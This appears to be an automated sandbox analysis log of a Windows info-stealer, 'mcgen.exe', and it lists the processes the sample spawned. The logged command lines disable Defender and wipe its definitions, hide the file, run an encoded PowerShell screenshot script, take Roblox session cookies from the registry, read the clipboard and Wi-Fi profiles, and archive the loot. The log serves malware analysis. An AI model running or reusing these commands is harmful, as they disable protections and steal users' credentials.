              Source: mcgen.exe, mcgen.exe, 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: mcgen.exe, mcgen.exe, 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: mcgen.exe, mcgen.exe, 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: mcgen.exeVirustotal: Detection: 44%
              Source: mcgen.exeReversingLabs: Detection: 47%
              Source: mcgen.exeString found in binary or memory: id-cmc-addExtensions
              Source: mcgen.exeString found in binary or memory: set-addPolicy
              Source: mcgen.exeString found in binary or memory: --help
              Source: mcgen.exeString found in binary or memory: --help
              Source: mcgen.exeString found in binary or memory: can't send non-None value to a just-started coroutine
              Source: mcgen.exeString found in binary or memory: various kinds of output. Setting it to 0 deactivates this behavior. PYTHON_HISTORY : the location of a .python_history file. These variables have equivalent command-line options (see --help for details): PYTHON_CPU_COUNT: override the retu
              Source: mcgen.exeString found in binary or memory: various kinds of output. Setting it to 0 deactivates this behavior. PYTHON_HISTORY : the location of a .python_history file. These variables have equivalent command-line options (see --help for details): PYTHON_CPU_COUNT: override the retu
              Source: mcgen.exeString found in binary or memory: can't send non-None value to a just-started async generator
              Source: mcgen.exeString found in binary or memory: can't send non-None value to a just-started generator
              Source: mcgen.exeString found in binary or memory: fma($module, x, y, z, /) -- Fused multiply-add operation. Compute (x * y) + z with a single round.
              Source: C:\Users\user\Desktop\mcgen.exeFile read: C:\Users\user\Desktop\mcgen.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\mcgen.exe "C:\Users\user\Desktop\mcgen.exe"
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Users\user\Desktop\mcgen.exe "C:\Users\user\Desktop\mcgen.exe"
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'"
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\mcgen.exe""
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\mcgen.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.cmdline"
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8ED.tmp" "c:\Users\user\AppData\Local\Temp\ppw2wipr\CSC774215641B8D46CBA5382B343227E316.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
